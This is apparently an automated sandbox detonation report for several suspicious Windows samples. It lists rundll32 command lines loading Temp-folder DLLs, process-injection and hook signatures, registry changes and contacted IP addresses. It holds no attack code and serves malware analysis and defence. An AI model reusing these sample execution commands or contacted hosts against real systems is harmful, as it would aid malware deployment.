rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3d9xx.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:14

Platform

win10-20240611-en

Max time kernel

52s

Max time network

61s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libcef.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3360 wrote to memory of 4712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3360 wrote to memory of 4712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3360 wrote to memory of 4712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libcef.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libcef.dll,#1

Network

Country Destination Domain Proto
GB 87.248.205.0:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:14

Platform

win10-20240404-en

Max time kernel

132s

Max time network

135s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\licension.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\licension.dll,#1

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:14

Platform

win10-20240404-en

Max time kernel

132s

Max time network

136s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\open me - 1212.txt"

Signatures

N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\open me - 1212.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 f.f.f.f.d.b.b.8.0.9.8.2.0.9.0.8.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:14

Platform

win10-20240404-en

Max time kernel

130s

Max time network

137s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\[email protected]

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp

Files

N/A